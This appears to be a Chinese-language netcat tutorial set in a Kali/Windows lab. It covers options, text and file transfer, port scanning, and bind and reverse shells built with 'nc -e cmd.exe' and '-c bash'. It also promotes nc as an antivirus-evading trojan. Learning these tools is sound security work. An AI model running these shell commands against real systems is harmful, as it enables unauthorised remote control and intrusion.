NC瑞士军刀 网络工具

nc介绍

nc作为网络工具中的瑞士军刀，是学习信息安全必须掌握的工具之一，nc的大小只有几十kb包括Linux版和windows版，但它的作用也是非常之大。

nc作用

1. 侦听模式 / 传输模式
2. telnet / 获取banner信息
3. 传输文本信息
4. 传输文件/目录
5. 加密传输文件
6. 远程控制/木⻢：杀毒软件不会查杀
7. 加密所有流量
8. 流媒体服务器
9. 远程克隆硬盘

工具参数

基本格式：nc [-options] hostname port [ports] …
nc -l -p port [options] [hostname] [port]

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, …
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出–用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉–用于扫描时

使用教程

环境：

主机	ip
kali	192.168.252.128
windows 10	192.168.252.130

kali中自带windows 版和Linux版nc

将nc.exe下载到windos 10放入C:\Windows\System32
使用cmd 使用nc

传输文本信息

建立连接

kali：
nc -lp 99 #使用监听模式监听端口为99
windows 10 ：
nc -nv 192.168.252.128 99 #连接kali监听端口
注意这里nc没有加-u参数使用的是tcp连接

此时可以发送文本信息

nc -ul -p  9999
nc -u 192.168.252.128 9999
面向udp连接

文件传输

nc -l 9999 < 1.txt
nc 192.168.252.128 > 1.txt

内存取证

nc -l -p 4444 > quzheng.txt
ls -l | nc -nv 192.168.252.130 4444

端口扫描

nc -nvz 192.168.252.130 1-65535  #-z 扫描模式，扫描io  默认tcp端口
nc -nvzu 192.168.252.130 1-1024  #-u udp端口 

shell连接

正向

Linux连接
  nc -lp 4444 -c bash
  nc 192.168.252.128 4444

windows 连接

nc -l -p 5555 -t -e cmd.exe
nc -nvv 192.168.252.130 5555

反向连接

windows 监听：
nc -lp 4444
kali开端口：
nc  192.168.252.130 4444 -c bash

kali监听
nc -lp 5555
windows 开端口
nc -t -e cmd 192.168.252.128 5555